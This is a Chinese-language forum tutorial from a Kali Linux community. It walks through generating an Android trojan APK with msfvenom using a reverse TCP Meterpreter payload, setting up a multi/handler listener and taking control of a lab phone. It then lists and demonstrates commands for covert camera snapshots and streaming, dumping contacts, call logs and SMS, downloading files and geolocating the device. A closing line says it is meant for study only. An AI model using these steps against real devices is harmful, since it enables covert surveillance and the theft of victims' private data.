找回密码
 立即注册

QQ登录

只需一步,快速开始

文章来自Kali中文网论坛(www.kaliorg.com)

       本!!!


kali机:192.168.198.134
安卓机:192.168.198.1
安卓版本:5.0.1
我们先来查看下自己的IP地址
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
接着我们使用fping来扫描一下局域网内的所有IP
fping -g IP/24 -->扫描局域网内所有IP
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
攻击正式开始
1.我们先用msfvenom来生成一个木马文件,它将在root目录生成一个名叫shell.apk文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.198.134 LPORT=5555 R > /root/shell.apk

LHOST -->本地的IP地址
LPORT -->反向连接到主机的端口
R> -->木马生成的保存输出路径
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
2.打开msfconsole,键入以下代码
msf > use exploit/multi/handler -->设置模块
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp -->设置payload为反向tcp连接
msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址
msf exploit(multi/handler) > set lport 5555 -->设置端口,需要跟前面生成的木马端口一致
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
开始攻击
exploit -->执行攻击命令
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
3.现在需要把木马文件安装到安卓手机上去,我这里已经安装好了

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
安装完成会出现一个叫MainActivity的应用
现在我们尝试来打开它,然而并没有什么反应,但实际上木马已经运行了,kali也监听到了

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
4.开始搞事
现在你就可以为所欲为了,我这里给你们一些指令

cd -->目录切换,命令:cd / 切换到根目录
search -->搜索文件,命令:search text.jpg
download -->下载文件,命令:download test.jpg
webcam_list -->查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream -->开启摄像头视频监控,同上,命令:webcam_stream -i 1
安卓系统相关命令:
check_root -->查看当前安卓是否已经root
dump_calllog -->下载通话记录
dump_contacts -->下载通讯录
dump_sms -->下载短信记录
geolocate -->利用谷歌地图定位(需要安装谷歌地图)
我们以导出通讯录为例
watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
可以看见已经导出来了,文件名为contacts_dump_20200117010906.txt
然后我们来验证一下是不是真的

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg
是不是很快乐
好的本次教程就到这里,有不懂的欢迎私信!

安全无边疆,努力习知识


本文章只供学习交流学习不可用于其他非法用途!!!
文章作者:sievr
文章来源:kali中文网论坛:www.kaliorg.com
版权声明:凡注明“来源:kali中文网”的所有作品,均为kali中文网以作者的作品,未经作者及网站授权不得转载、摘编或利用其它方式使用上述作品。已经本网授权使用作品的,应在授权范围内使用,并注明“来源:kali中文网(www.kaliorg.com)”。违反上述声明者,本站将追究其相关法律责任

分享至 : QQ空间
收藏

1 个回复

倒序浏览
很详细,到我的收藏夹吃灰吧
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 立即注册